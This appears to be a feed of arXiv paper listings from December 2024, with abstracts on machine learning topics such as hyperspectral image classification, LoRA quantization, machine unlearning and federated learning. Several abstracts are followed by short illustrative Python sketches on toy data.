Dual-Branch Subpixel-Guided Network for Hyperspectral Image Classification
Deep learning (DL) has been widely applied into hyperspectral image (HSI) classification owing to its promising feature learning and representation capabilities. However, limited by the spatial resolution of sensors, existing DL-based classification approaches mainly focus on pixel-level spectral and spatial information extraction through complex network architecture design, while ignoring the existence of mixed pixels in actual scenarios. To tackle this difficulty, we propose a novel dual-branch subpixel-guided network for HSI classification, called DSNet, which automatically integrates subpixel information and convolutional class features by introducing a deep autoencoder unmixing architecture to enhance classification performance. DSNet is capable of fully considering physically nonlinear properties within subpixels and adaptively generating diagnostic abundances in an unsupervised manner to achieve more reliable decision boundaries for class label distributions. The subpixel fusion module is designed to ensure high-quality information fusion across pixel and subpixel features, further promoting stable joint classification. Experimental results on three benchmark datasets demonstrate the effectiveness and superiority of DSNet compared with state-of-the-art DL-based HSI classification approaches. The codes will be available at https://github.com/hanzhu97702/DSNet, contributing to the remote sensing community.
Updated: 2024-12-05 06:03:09
Domains: eess.IV,cs.AI,cs.CV
Train a Real-world Local Path Planner in One Hour via Partially Decoupled Reinforcement Learning and Vectorized Diversity
Deep Reinforcement Learning (DRL) has exhibited efficacy in resolving the Local Path Planning (LPP) problem. However, such application in the real world is immensely limited due to the deficient training efficiency and generalization capability of DRL. To alleviate these two issues, a solution named Color is proposed, which consists of an Actor-Sharer-Learner (ASL) training framework and a mobile robot-oriented simulator Sparrow. Specifically, the ASL intends to improve the training efficiency of DRL algorithms. It employs a Vectorized Data Collection (VDC) mode to expedite data acquisition, decouples the data collection from model optimization by multithreading, and partially connects the two procedures by harnessing a Time Feedback Mechanism (TFM) to evade data underuse or overuse. Meanwhile, the Sparrow simulator utilizes a 2D grid-based world, simplified kinematics, and conversion-free data flow to achieve a lightweight design. The lightness facilitates vectorized diversity, allowing diversified simulation setups across extensive copies of the vectorized environments, resulting in a notable enhancement in the generalization capability of the DRL algorithm being trained. Comprehensive experiments, comprising 57 DRL benchmark environments, 32 simulated and 36 real-world LPP scenarios, have been conducted to corroborate the superiority of our method in terms of efficiency and generalization. The code and the video of this paper are accessible at https://github.com/XinJingHao/Color.
Updated: 2024-12-05 06:01:33
Domains: cs.AI,cs.RO
HERO: Hint-Based Efficient and Reliable Query Optimizer
We propose a novel model for learned query optimization which provides query hints leading to better execution plans. The model addresses the three key challenges in learned hint-based query optimization: reliable hint recommendation (ensuring non-degradation of query latency), efficient hint exploration, and fast inference. We provide an in-depth analysis of existing NN-based approaches to hint-based optimization and experimentally confirm these challenges. Our alternative solution consists of a new inference schema based on an ensemble of context-aware models and a graph storage for reliable hint suggestion and fast inference, and a budget-controlled training procedure with a local search algorithm that solves the issue of exponential search space exploration. In experiments on standard benchmarks, our model demonstrates optimization capability close to the best achievable with coarse-grained hints. Controlling the degree of parallelism (query DOP) in addition to operator-related hints enables our model to achieve a 3x latency improvement on the JOB benchmark, which sets a new standard for optimization. Our model is interpretable and easy to debug, which is particularly important for deployment in production.
Updated: 2024-12-05 06:00:34
Domains: cs.DB,cs.AI,cs.LG,H.2.4; I.2.6; I.2.8
Knowledge Transfer based Evolutionary Deep Neural Network for Intelligent Fault Diagnosis
Fault diagnosis with commendable accuracy is essential for the reliability of industrial machines. Two main challenges affect the design of high-performing intelligent systems: (i) the selection of a suitable model and (ii) domain adaptation if there is a continuous change in operating conditions. Therefore, we propose an evolutionary Net2Net transformation (EvoN2N) that finds the best suitable DNN architecture with limited availability of labeled data samples. A Net2Net transformation-based quick learning algorithm is used in the evolutionary framework of the Non-dominated Sorting Genetic Algorithm II to obtain the best DNN architecture. This quick learning algorithm uses the concept of knowledge transfer from one generation to the next for faster fitness evaluation. The proposed framework can obtain the best model for intelligent fault diagnosis without a long and time-consuming search process. It has been validated on the Case Western Reserve University dataset, the Paderborn University dataset, and the gearbox fault detection dataset under different operating conditions. The best models obtained demonstrate excellent diagnostic performance, with classification accuracy of almost 100% for most of the operating conditions.
Updated: 2024-12-05 05:50:39
Domains: eess.SP,cs.AI,cs.SY,eess.SY,math.OC
Uniform Discretized Integrated Gradients: An effective attribution based method for explaining large language models
Integrated Gradients is a well-known technique for explaining deep learning models. It calculates feature importance scores by employing a gradient based approach computing gradients of the model output with respect to input features and accumulating them along a linear path. While this works well for continuous features spaces, it may not be the most optimal way to deal with discrete spaces like word embeddings. For interpreting LLMs (Large Language Models), there exists a need for a non-linear path where intermediate points, whose gradients are to be computed, lie close to actual words in the embedding space. In this paper, we propose a method called Uniform Discretized Integrated Gradients (UDIG) based on a new interpolation strategy where we choose a favorable nonlinear path for computing attribution scores suitable for predictive language models. We evaluate our method on two types of NLP tasks- Sentiment Classification and Question Answering against three metrics viz Log odds, Comprehensiveness and Sufficiency. For sentiment classification, we have used the SST2, IMDb and Rotten Tomatoes datasets for benchmarking and for Question Answering, we have used the fine-tuned BERT model on SQuAD dataset. Our approach outperforms the existing methods in almost all the metrics.
Updated: 2024-12-05 05:39:03
Domains: cs.CL,cs.AI
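The contrast with vanilla Integrated Gradients can be made concrete: instead of differentiating at arbitrary points on the straight line between baseline and input, snap each interpolation point to its nearest real token embedding. The sketch below implements that snapping idea with a toy model and vocabulary; UDIG's exact path-construction strategy may differ.

```python
import torch

torch.manual_seed(0)
vocab = torch.randn(1000, 16)               # token embedding table
emb = vocab[torch.tensor([5, 42, 7])]       # a 3-token input
baseline = torch.zeros_like(emb)

def model(x):                               # toy scalar "prediction"
    return torch.tanh(x.sum(dim=-1)).sum()

def snap(points):
    """Snap interpolation points to their nearest real token embeddings,
    so gradients are evaluated where actual words live."""
    return vocab[torch.cdist(points, vocab).argmin(dim=-1)]

def integrated_gradients(steps=32, discretize=True):
    total = torch.zeros_like(emb)
    for a in torch.linspace(0, 1, steps):
        point = baseline + a * (emb - baseline)
        if discretize:                      # the discretized-path idea
            point = snap(point)
        point = point.detach().requires_grad_(True)
        model(point).backward()
        total += point.grad
    return (emb - baseline) * total / steps

print("per-token attribution:", integrated_gradients().sum(dim=-1))
```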
Nl2Hltl2Plan: Scaling Up Natural Language Understanding for Multi-Robots Through Hierarchical Temporal Logic Task Representation
To enable non-experts to specify long-horizon, multi-robot collaborative tasks, language models are increasingly used to translate natural language commands into formal specifications. However, because translation can occur in multiple ways, such translations may lack accuracy or lead to inefficient multi-robot planning. Our key insight is that concise hierarchical specifications can simplify planning while remaining straightforward to derive from human instructions. We propose Nl2Hltl2Plan, a framework that translates natural language commands into hierarchical Linear Temporal Logic (LTL) and solves the corresponding planning problem. The translation involves two steps leveraging Large Language Models (LLMs). First, an LLM transforms instructions into a Hierarchical Task Tree, capturing logical and temporal relations. Next, a fine-tuned LLM converts sub-tasks into flat LTL formulas, which are aggregated into hierarchical specifications, with the lowest level corresponding to ordered robot actions. These specifications are then used with off-the-shelf planners. Our Nl2Hltl2Plan demonstrates the potential of LLMs in hierarchical reasoning for multi-robot task planning. Evaluations in simulation and real-world experiments with human participants show that Nl2Hltl2Plan outperforms existing methods, handling more complex instructions while achieving higher success rates and lower costs in task allocation and planning. Additional details are available at https://nl2hltl2plan.github.io .
Updated: 2024-12-05 05:37:46
Domains: cs.RO,cs.AI,cs.LO
Fourier Boundary Features Network with Wider Catchers for Glass Segmentation
Glass largely blurs the boundary between the real world and its reflection. Its special transmittance and reflectance qualities have confounded semantic tasks in machine vision. Therefore, how to clear the boundary built by glass, and avoid over-capturing features as false positive information in deep structures, matters for constraining the segmentation of reflective surfaces and penetrating glass. We propose the Fourier Boundary Features Network with Wider Catchers (FBWC), which might be the first attempt to utilize sufficiently wide horizontal shallow branches without vertical deepening for guiding the fine-granularity segmentation boundary through primary glass semantic information. Specifically, we design the Wider Coarse-Catchers (WCC) to anchor large-area segmentation and reduce excessive extraction from a structural perspective. We embed fine-grained features by Cross Transpose Attention (CTA), which is introduced to avoid the incomplete areas within the boundary caused by reflection noise. To excavate glass features and balance high-low layer context, a learnable Fourier Convolution Controller (FCC) is proposed to regulate information integration robustly. The proposed method has been validated on three different public glass segmentation datasets. Experimental results reveal that the proposed method yields better segmentation performance compared with state-of-the-art (SOTA) methods in glass image segmentation.
Updated: 2024-12-05 05:37:23
Domains: cs.CV,cs.AI
A Unified Framework for Evaluating the Effectiveness and Enhancing the Transparency of Explainable AI Methods in Real-World Applications
The rapid advancement of deep learning has resulted in substantial advancements in AI-driven applications; however, the "black box" characteristic of these models frequently constrains their interpretability, transparency, and reliability. Explainable artificial intelligence (XAI) seeks to elucidate AI decision-making processes, guaranteeing that explanations faithfully represent the model's rationale and correspond with human comprehension. Despite comprehensive research in XAI, a significant gap persists in standardized procedures for assessing the efficacy and transparency of XAI techniques across many real-world applications. This study presents a unified XAI evaluation framework incorporating extensive quantitative and qualitative criteria to systematically evaluate the correctness, interpretability, robustness, fairness, and completeness of explanations generated by AI models. The framework prioritizes user-centric and domain-specific adaptations, hence improving the usability and reliability of AI models in essential domains. To address deficiencies in existing evaluation processes, we suggest defined benchmarks and a systematic evaluation pipeline that includes data loading, explanation development, and thorough method assessment. The suggested framework's relevance and variety are evidenced by case studies in healthcare, finance, agriculture, and autonomous systems. These provide a solid basis for the equitable and dependable assessment of XAI methodologies. This paradigm enhances XAI research by offering a systematic, flexible, and pragmatic method to guarantee transparency and accountability in AI systems across many real-world contexts.
Updated: 2024-12-05 05:30:10
Domains: cs.AI
Weak-to-Strong Generalization Through the Data-Centric Lens
The weak-to-strong generalization phenomenon is the driver for important machine learning applications including highly data-efficient learning and, most recently, performing superalignment. While decades of research have resulted in numerous algorithms that produce strong empirical performance, understanding what aspects of data enable weak-to-strong generalization has been understudied. We propose a simple data-centric mechanism that characterizes weak-to-strong generalization: the overlap density. Intuitively, generalization tracks the number of points that contain overlaps, i.e., both easy patterns (learnable by a weak model) and challenging patterns (only learnable by a stronger model), as with such points, weak predictions can be used to learn challenging patterns by stronger models. We provide a practical overlap detection algorithm to find such points in datasets and leverage them to learn, among multiple sources of data, which to query when seeking to maximize overlap density and thereby enhance weak-to-strong generalization. We present a theoretical result showing that the generalization benefit is a function of the overlap density and a regret bound for our data selection algorithm. Empirically, we validate the mechanism and the overlap detection algorithm on a wide array of settings.
Updated: 2024-12-05 05:29:19
Domains: cs.LG,cs.AI,stat.ML
Transferring self-supervised pre-trained models for SHM data anomaly detection with scarce labeled data
Structural health monitoring (SHM) has experienced significant advancements in recent decades, accumulating massive monitoring data. Data anomalies inevitably exist in monitoring data, posing significant challenges to their effective utilization. Recently, deep learning has emerged as an efficient and effective approach for anomaly detection in bridge SHM. Despite its progress, many deep learning models require large amounts of labeled data for training. The process of labeling data, however, is labor-intensive, time-consuming, and often impractical for large-scale SHM datasets. To address these challenges, this work explores the use of self-supervised learning (SSL), an emerging paradigm that combines unsupervised pre-training and supervised fine-tuning. The SSL-based framework aims to learn from only a very small quantity of labeled data by fine-tuning, while making the best use of the vast amount of unlabeled SHM data by pre-training. Mainstream SSL methods are compared and validated on the SHM data of two in-service bridges. Comparative analysis demonstrates that SSL techniques boost data anomaly detection performance, achieving increased F1 scores compared to conventional supervised training, especially given a very limited amount of labeled data. This work manifests the effectiveness and superiority of SSL techniques on large-scale SHM data, providing an efficient tool for preliminary anomaly detection with scarce label information.
Updated: 2024-12-05 05:25:30
Domains: cs.LG,cs.CE
AyutthayaAlpha: A Thai-Latin Script Transliteration Transformer
This study introduces AyutthayaAlpha, an advanced transformer-based machine learning model designed for the transliteration of Thai proper names into Latin script. Our system achieves state-of-the-art performance with 82.32% first-token accuracy and 95.24% first-three-token accuracy, while maintaining a low character error rate of 0.0047. The complexity of Thai phonology, including tonal features and vowel length distinctions, presents significant challenges for accurate transliteration, which we address through a novel two-model approach: AyutthayaAlpha-Small, based on the ByT5 architecture, and AyutthayaAlpha-VerySmall, a computationally efficient variant that unexpectedly outperforms its larger counterpart. Our research combines linguistic rules with deep learning, training on a carefully curated dataset of 1.2 million Thai-Latin name pairs, augmented through strategic upsampling to 2.7 million examples. Extensive evaluations against existing transliteration methods and human expert benchmarks demonstrate that AyutthayaAlpha not only achieves superior accuracy but also effectively captures personal and cultural preferences in name romanization. The system's practical applications extend to cross-lingual information retrieval, international data standardization, and identity verification systems, with particular relevance for government databases, academic institutions, and global business operations. This work represents a significant advance in bridging linguistic gaps between Thai and Latin scripts, while respecting the cultural and personal dimensions of name transliteration.
Updated: 2024-12-05 05:18:09
Domains: cs.CL,cs.AI
RILQ: Rank-Insensitive LoRA-based Quantization Error Compensation for Boosting 2-bit Large Language Model Accuracy
Low-rank adaptation (LoRA) has become the dominant method for parameter-efficient LLM fine-tuning, with LoRA-based quantization error compensation (LQEC) emerging as a powerful tool for recovering accuracy in compressed LLMs. However, LQEC has underperformed in sub-4-bit scenarios, with no prior investigation into understanding this limitation. We propose RILQ (Rank-Insensitive LoRA-based Quantization Error Compensation) to understand fundamental limitation and boost 2-bit LLM accuracy. Based on rank analysis revealing model-wise activation discrepancy loss's rank-insensitive nature, RILQ employs this loss to adjust adapters cooperatively across layers, enabling robust error compensation with low-rank adapters. Evaluations on LLaMA-2 and LLaMA-3 demonstrate RILQ's consistent improvements in 2-bit quantized inference across various state-of-the-art quantizers and enhanced accuracy in task-specific fine-tuning. RILQ maintains computational efficiency comparable to existing LoRA methods, enabling adapter-merged weight-quantized LLM inference with significantly enhanced accuracy, making it a promising approach for boosting 2-bit LLM performance.
Updated: 2024-12-05 05:05:01
Domains: cs.LG,cs.AI
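The quantization-error-compensation idea, training low-rank adapters so that activations of the compensated quantized weight match those of the full-precision weight, can be sketched as follows. The crude 2-bit quantizer, the rank, and the calibration data are illustrative; RILQ's rank-insensitive loss also aggregates this discrepancy model-wise rather than per layer.

```python
import torch

torch.manual_seed(0)
d, rank = 256, 16
W = torch.randn(d, d) / d ** 0.5            # full-precision weight

def quantize_2bit(w):
    """Crude symmetric 2-bit quantizer (a stand-in for a SOTA quantizer)."""
    scale = w.abs().max() / 1.5
    return (w / scale).round().clamp(-2, 1) * scale

W_q = quantize_2bit(W)

# LoRA adapters trained to shrink the *activation* discrepancy between the
# full-precision layer and the compensated quantized layer.
A = torch.zeros(rank, d, requires_grad=True)
B = (torch.randn(d, rank) * 0.01).requires_grad_()
opt = torch.optim.Adam([A, B], lr=1e-3)
X = torch.randn(4096, d)                    # calibration activations

for step in range(500):
    err = X @ W.T - X @ (W_q + B @ A).T
    loss = err.pow(2).mean()
    opt.zero_grad()
    loss.backward()
    opt.step()

base = (X @ W.T - X @ W_q.T).pow(2).mean()
print(f"activation MSE: {base.item():.4f} -> {loss.item():.4f}")
```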
Fine-Grained Sentiment Analysis of Electric Vehicle User Reviews: A Bidirectional LSTM Approach to Capturing Emotional Intensity in Chinese Text
The rapid expansion of the electric vehicle (EV) industry has highlighted the importance of user feedback in improving product design and charging infrastructure. Traditional sentiment analysis methods often oversimplify the complexity of user emotions, limiting their effectiveness in capturing nuanced sentiments and emotional intensities. This study proposes a Bidirectional Long Short-Term Memory (Bi-LSTM) network-based sentiment scoring model to analyze user reviews of EV charging infrastructure. By assigning sentiment scores ranging from 0 to 5, the model provides a fine-grained understanding of emotional expression. Leveraging a dataset of 43,678 reviews from PC Auto, the study employs rigorous data cleaning and preprocessing, including tokenization and stop word removal, to optimize input for deep learning. The Bi-LSTM model demonstrates significant improvements over traditional approaches like SnowNLP across key evaluation metrics, including Mean Squared Error (MSE), Mean Absolute Error (MAE), and Explained Variance Score (EVS). These results highlight the model's superior capability to capture nuanced sentiment dynamics, offering valuable insights for targeted product and service enhancements in the EV ecosystem.
Updated: 2024-12-05 05:04:29
Domains: cs.AI
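A minimal PyTorch sketch of the scoring architecture (an embedding layer, a bidirectional LSTM, mean pooling, and a head squashed into the 0-5 range) is given below; the vocabulary size, dimensions, and pooling choice are assumptions, not the paper's configuration.

```python
import torch
import torch.nn as nn

class BiLSTMScorer(nn.Module):
    """Embedding -> bidirectional LSTM -> mean pooling -> score in [0, 5]."""
    def __init__(self, vocab_size=10_000, emb_dim=128, hidden=64):
        super().__init__()
        self.embed = nn.Embedding(vocab_size, emb_dim, padding_idx=0)
        self.lstm = nn.LSTM(emb_dim, hidden, batch_first=True,
                            bidirectional=True)
        self.head = nn.Linear(2 * hidden, 1)

    def forward(self, token_ids):
        h, _ = self.lstm(self.embed(token_ids))      # (B, T, 2*hidden)
        pooled = h.mean(dim=1)                       # average over tokens
        return 5.0 * torch.sigmoid(self.head(pooled)).squeeze(-1)

model = BiLSTMScorer()
batch = torch.randint(1, 10_000, (4, 32))            # 4 tokenized reviews
scores = model(batch)
loss = nn.functional.mse_loss(scores, torch.tensor([4.5, 1.0, 3.2, 0.5]))
loss.backward()
print(scores.detach(), loss.item())
```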
Remaining-data-free Machine Unlearning by Suppressing Sample Contribution
Machine unlearning (MU) aims to forget data from a well-trained model, which is practically important due to the "right to be forgotten". The unlearned model should approach the retrained model, in which the forgetting data are not involved in the training process and hence do not contribute to the retrained model. Considering the forgetting data's absence during retraining, we argue that unlearning should withdraw their contribution from the pre-trained model. The challenge is, when tracing the learning process is impractical, how to quantify and detach a sample's contribution to the dynamic learning process using only the pre-trained model. We first theoretically show that a sample's contribution during the process is reflected in the learned model's sensitivity to it. We then design a novel method, namely MU-Mis (Machine Unlearning by Minimizing input sensitivity), to suppress the contribution of the forgetting data. Experimental results demonstrate that MU-Mis can unlearn effectively and efficiently without utilizing the remaining data. It is the first time that a remaining-data-free method outperforms state-of-the-art (SoTA) unlearning methods that utilize the remaining data.
Updated: 2024-12-05 04:45:32
Domains: cs.LG
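The method's name suggests the objective directly: minimize the model's sensitivity to the forgetting inputs. The sketch below uses the squared input-gradient norm of the summed logits as a simplified proxy for that sensitivity; the paper's exact sensitivity measure and optimization schedule may differ. Note that only the forgetting data appear in the loop.

```python
import torch
import torch.nn as nn

torch.manual_seed(0)
model = nn.Sequential(nn.Linear(20, 64), nn.ReLU(), nn.Linear(64, 10))
forget_x = torch.randn(16, 20)              # only the forgetting data
opt = torch.optim.SGD(model.parameters(), lr=0.01)

def input_sensitivity(x):
    """Squared norm of d(output)/d(input): a simplified sensitivity proxy."""
    x = x.detach().requires_grad_(True)
    grads = torch.autograd.grad(model(x).sum(), x, create_graph=True)[0]
    return grads.pow(2).sum(dim=1).mean()

for step in range(50):                      # no remaining data in the loop
    loss = input_sensitivity(forget_x)
    opt.zero_grad()
    loss.backward()
    opt.step()
    if step % 10 == 0:
        print(f"step {step}: sensitivity {loss.item():.4f}")
```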
PreAct: Prediction Enhances Agent's Planning Ability
Addressing the disparity between forecasts and actual results can enable individuals to expand their thought processes and stimulate self-reflection, thus promoting accurate planning. In this research, we present PreAct, an agent framework that integrates prediction, reasoning, and action. By utilizing the information derived from predictions, the large language model (LLM) agent can provide a wider range and more strategically focused reasoning. This leads to more efficient actions that aid the agent in accomplishing intricate tasks. Our experimental results show that PreAct surpasses the ReAct method in completing complex tasks and that PreAct's performance can be further improved when paired with other memory or selection strategy techniques. We presented the model with varying quantities of historical predictions and discovered that these predictions consistently enhance LLM planning. The variances in single-step reasoning between PreAct and ReAct indicate that PreAct indeed has benefits in terms of diversity and strategic orientation over ReAct.
Updated: 2024-12-05 04:40:54
Domains: cs.CL,cs.AI
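The prediction-reasoning-action cycle can be sketched as a plain agent loop. In the stub below, llm and environment are hypothetical placeholders for an LLM backend and a task environment, and the prompt phrasing is illustrative, not the paper's.

```python
def llm(prompt: str) -> str:
    raise NotImplementedError("plug in an LLM backend here")

def environment(action: str) -> str:
    raise NotImplementedError("execute the action, return an observation")

def preact_episode(task: str, max_steps: int = 10) -> str:
    history = f"Task: {task}\n"
    for _ in range(max_steps):
        # 1. Prediction: anticipate plausible outcomes before deciding.
        prediction = llm(history + "Predict possible next outcomes:")
        # 2. Reasoning: condition the thought on those predictions.
        thought = llm(history + f"Predictions: {prediction}\nThought:")
        # 3. Action: commit and observe (ReAct plus a prediction step).
        action = llm(history + f"Thought: {thought}\nAction:")
        observation = environment(action)
        history += (f"Predictions: {prediction}\nThought: {thought}\n"
                    f"Action: {action}\nObservation: {observation}\n")
        if action.strip().lower().startswith("finish"):
            break
    return history
```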
Network Formation and Dynamics Among Multi-LLMs
Social networks fundamentally shape human opinions, behaviors, and the dissemination of information. As large language models (LLMs) like GPT, Claude, and Llama increasingly integrate into social and professional settings, understanding their behavior in the context of social interactions and network formation becomes essential. This study develops a framework to systematically examine whether the network formation behaviors of multiple LLMs approximate certain aspects of human network dynamics. By simulating interactions among LLM agents across various model families, we observe that these models consistently exhibit key patterns associated with social network principles including preferential attachment, triadic closure, homophily, community structure, and the small-world phenomenon when forming networks. Moreover, LLMs adapt their network formation strategies based on each network's characteristics, reflecting the context-dependent nature of human behavior: in Facebook networks, they prioritize triadic closure and homophily, mirroring close-knit friendships; in phone networks, homophily and preferential attachment dominate, capturing personal and professional connections, while in employment networks, LLMs favor heterophily and high-degree connections, aligning with career advancement dynamics. These results open new avenues for using LLMs in network science research, with potential applications in agent-based modeling and synthetic network generation.
Updated: 2024-12-05 04:35:22
Domains: cs.SI,cs.AI,cs.CL,cs.MA
Yi-Lightning Technical Report
This technical report presents Yi-Lightning, our latest flagship large language model (LLM). It achieves exceptional performance, ranking 6th overall on Chatbot Arena, with particularly strong results (2nd to 4th place) in specialized categories including Chinese, Math, Coding, and Hard Prompts. Yi-Lightning leverages an enhanced Mixture-of-Experts (MoE) architecture, featuring advanced expert segmentation and routing mechanisms coupled with optimized KV-caching techniques. Our development process encompasses comprehensive pre-training, supervised fine-tuning (SFT), and reinforcement learning from human feedback (RLHF), where we devise deliberate strategies for multi-stage training, synthetic data construction, and reward modeling. Furthermore, we implement RAISE (Responsible AI Safety Engine), a four-component framework to address safety issues across pre-training, post-training, and serving phases. Empowered by our scalable super-computing infrastructure, all these innovations substantially reduce training, deployment and inference costs while maintaining high-performance standards. With further evaluations on public academic benchmarks, Yi-Lightning demonstrates competitive performance against top-tier LLMs, while we observe a notable disparity between traditional, static benchmark results and real-world, dynamic human preferences. This observation prompts a critical reassessment of conventional benchmarks' utility in guiding the development of more intelligent and powerful AI systems for practical applications. Yi-Lightning is now available through our developer platform at https://platform.lingyiwanwu.com.
Updated: 2024-12-05 04:29:49
Domains: cs.CL,cs.AI,cs.LG
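The abstract does not disclose Yi-Lightning's routing internals; the sketch below shows only the generic top-2 MoE routing pattern such architectures build on, with illustrative dimensions and randomly initialized gate and experts.

import numpy as np

rng = np.random.default_rng(0)
d, n_experts = 8, 4
W_gate = rng.normal(scale=0.1, size=(d, n_experts))
# Each expert here is just a random linear map; real experts are FFN blocks.
experts = [lambda x, W=rng.normal(scale=0.1, size=(d, d)): x @ W
           for _ in range(n_experts)]

def softmax(z):
    e = np.exp(z - z.max())
    return e / e.sum()

def moe_forward(x):
    probs = softmax(x @ W_gate)           # gate scores over experts
    top2 = np.argsort(probs)[-2:]         # route the token to its two best experts
    w = probs[top2] / probs[top2].sum()   # renormalize the selected gate weights
    return sum(wi * experts[i](x) for wi, i in zip(w, top2))

y = moe_forward(rng.normal(size=d))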
GP-FL: Model-Based Hessian Estimation for Second-Order Over-the-Air Federated Learning
Second-order methods are widely adopted to improve the convergence rate of learning algorithms. In federated learning (FL), these methods require the clients to share their local Hessian matrices with the parameter server (PS), which comes at a prohibitive communication cost. A classical solution to this issue is to approximate the global Hessian matrix from the first-order information. Unlike in idealized networks, this solution does not perform effectively in over-the-air FL settings, where the PS receives noisy versions of the local gradients. This paper introduces a novel second-order FL framework tailored for wireless channels. The pivotal innovation lies in the PS's capability to directly estimate the global Hessian matrix from the received noisy local gradients via a non-parametric method: the PS models the unknown Hessian matrix as a Gaussian process, and then uses the temporal relation between the gradients and Hessian along with the channel model to find a stochastic estimator for the global Hessian matrix. We refer to this method as Gaussian process-based Hessian modeling for wireless FL (GP-FL) and show that it exhibits a linear-quadratic convergence rate. Numerical experiments on various datasets demonstrate that GP-FL outperforms all classical baseline first and second order FL approaches.
Updated: 2024-12-05 04:27:41
Domains: cs.LG
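As a heavily simplified illustration of the non-parametric idea, the sketch below fits a Gaussian-process posterior mean to one noisy scalar coordinate of a gradient sequence across communication rounds; GP-FL's actual estimator also exploits the gradient-Hessian temporal relation and the channel model, which are omitted here.

import numpy as np

def rbf(t1, t2, length_scale=2.0):
    d = t1[:, None] - t2[None, :]
    return np.exp(-0.5 * (d / length_scale) ** 2)

rng = np.random.default_rng(0)
t = np.arange(20.0)                                   # communication rounds
g = np.sin(0.3 * t) + 0.2 * rng.normal(size=t.size)  # noisy received gradient coord

noise_var = 0.04                       # assumed channel-noise variance
K = rbf(t, t) + noise_var * np.eye(t.size)
alpha = np.linalg.solve(K, g)
g_denoised = rbf(t, t) @ alpha         # GP posterior mean at the observed rounds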
Training MLPs on Graphs without Supervision
Graph Neural Networks (GNNs) have demonstrated their effectiveness in various graph learning tasks, yet their reliance on neighborhood aggregation during inference poses challenges for deployment in latency-sensitive applications, such as real-time financial fraud detection. To address this limitation, recent studies have proposed distilling knowledge from teacher GNNs into student Multi-Layer Perceptrons (MLPs) trained on node content, aiming to accelerate inference. However, these approaches often inadequately explore structural information when inferring unseen nodes. To this end, we introduce SimMLP, a Self-supervised framework for learning MLPs on graphs, designed to fully integrate rich structural information into MLPs. Notably, SimMLP is the first MLP-learning method that can achieve equivalence to GNNs in the optimal case. The key idea is to employ self-supervised learning to align the representations encoded by graph context-aware GNNs and neighborhood dependency-free MLPs, thereby fully integrating the structural information into MLPs. We provide a comprehensive theoretical analysis, demonstrating the equivalence between SimMLP and GNNs based on mutual information and inductive bias, highlighting SimMLP's advanced structural learning capabilities. Additionally, we conduct extensive experiments on 20 benchmark datasets, covering node classification, link prediction, and graph classification, to showcase SimMLP's superiority over state-of-the-art baselines, particularly in scenarios involving unseen nodes (e.g., inductive and cold-start node classification) where structural insights are crucial. Our codes are available at: https://github.com/Zehong-Wang/SimMLP.
Updated: 2024-12-05 04:20:54
Domains: cs.LG,cs.AI,cs.SI
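A minimal PyTorch sketch of the alignment idea, assuming a one-layer GCN teacher, a frozen teacher per step, and cosine alignment; SimMLP's full self-supervised objective (augmentations, joint training) is not reproduced.

import torch
import torch.nn as nn
import torch.nn.functional as F

torch.manual_seed(0)
n, d_in, d_out = 50, 16, 32

# Toy graph: symmetric random adjacency with self-loops, row-normalized.
a = (torch.rand(n, n) < 0.1).float()
a = ((a + a.T) > 0).float() + torch.eye(n)
a_norm = a / a.sum(1, keepdim=True)
x = torch.randn(n, d_in)

class ToyGCN(nn.Module):
    def __init__(self):
        super().__init__()
        self.lin = nn.Linear(d_in, d_out)
    def forward(self, x):
        return a_norm @ self.lin(x)   # one round of neighborhood aggregation

gnn = ToyGCN()
mlp = nn.Sequential(nn.Linear(d_in, d_out), nn.ReLU(), nn.Linear(d_out, d_out))
opt = torch.optim.Adam(mlp.parameters(), lr=1e-3)

for _ in range(200):
    with torch.no_grad():
        target = gnn(x)                       # structure-aware embeddings
    z = mlp(x)                                # neighborhood-free embeddings
    loss = (1 - F.cosine_similarity(z, target, dim=-1)).mean()
    opt.zero_grad(); loss.backward(); opt.step()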
CREMA: Generalizable and Efficient Video-Language Reasoning via Multimodal Modular Fusion
Despite impressive advancements in recent multimodal reasoning approaches, they are still limited in flexibility and efficiency, as these models typically process only a few fixed modality inputs and require updates to numerous parameters. This paper tackles these critical challenges and proposes CREMA, a generalizable, highly efficient, and modular modality-fusion framework that can incorporate any new modality to enhance video reasoning. We first augment multiple informative modalities (such as optical flow, 3D point cloud, audio, thermal heatmap, and touch map) from given videos without extra human annotation by leveraging sensors or existing pre-trained models. Next, we introduce a query transformer with multiple parameter-efficient modules associated with each accessible modality. It projects diverse modality features to the LLM token embedding space, allowing the model to integrate different data types for response generation. Furthermore, we propose a novel progressive multimodal fusion design supported by a lightweight fusion module and modality-sequential training strategy. It helps compress information across various assisting modalities, maintaining computational efficiency in the LLM while improving performance. We validate our method on 7 video-language reasoning tasks assisted by diverse modalities, including conventional VideoQA and Video-Audio/3D/Touch/Thermal QA, and achieve better/equivalent performance against strong multimodal LLMs, including OneLLM, BLIP-2, and SeViLA while reducing over 90% trainable parameters. We provide extensive analyses of CREMA, including the impact of each modality on reasoning domains, the design of the fusion module, and example visualizations.
Updated: 2024-12-05 04:16:54
Domains: cs.CV,cs.AI,cs.CL
How Good is ChatGPT in Giving Adaptive Guidance Using Knowledge Graphs in E-Learning Environments?
E-learning environments are increasingly harnessing large language models (LLMs) like GPT-3.5 and GPT-4 for tailored educational support. This study introduces an approach that integrates dynamic knowledge graphs with LLMs to offer nuanced student assistance. By evaluating past and ongoing student interactions, the system identifies and appends the most salient learning context to prompts directed at the LLM. Central to this method is the knowledge graph's role in assessing a student's comprehension of topic prerequisites. Depending on the categorized understanding (good, average, or poor), the LLM adjusts its guidance, offering advanced assistance, foundational reviews, or in-depth prerequisite explanations, respectively. Preliminary findings suggest students could benefit from this tiered support, achieving enhanced comprehension and improved task outcomes. However, several issues related to potential errors arising from LLMs were identified, which can potentially mislead students. This highlights the need for human intervention to mitigate these risks. This research aims to advance AI-driven personalized learning while acknowledging the limitations and potential pitfalls, thus guiding future research in technology and data-driven education.
Updated: 2024-12-05 04:05:43
Domains: cs.AI,cs.ET,I.2.6; I.2.11
What Do Machine Learning Researchers Mean by "Reproducible"?
The concern that Artificial Intelligence (AI) and Machine Learning (ML) are entering a "reproducibility crisis" has spurred significant research in the past few years. Yet with each paper, it is often unclear what someone means by "reproducibility". Our work attempts to clarify the scope of "reproducibility" as displayed by the community at large. In doing so, we propose to refine the research to eight general topic areas. In this light, we see that each of these areas contains many works that do not advertise themselves as being about "reproducibility", in part because they go back decades before the matter came to broader attention.
Updated: 2024-12-05 04:04:39
Domains: cs.LG,cs.AI,stat.ML
Stabilizer bootstrapping: A recipe for efficient agnostic tomography and magic estimation
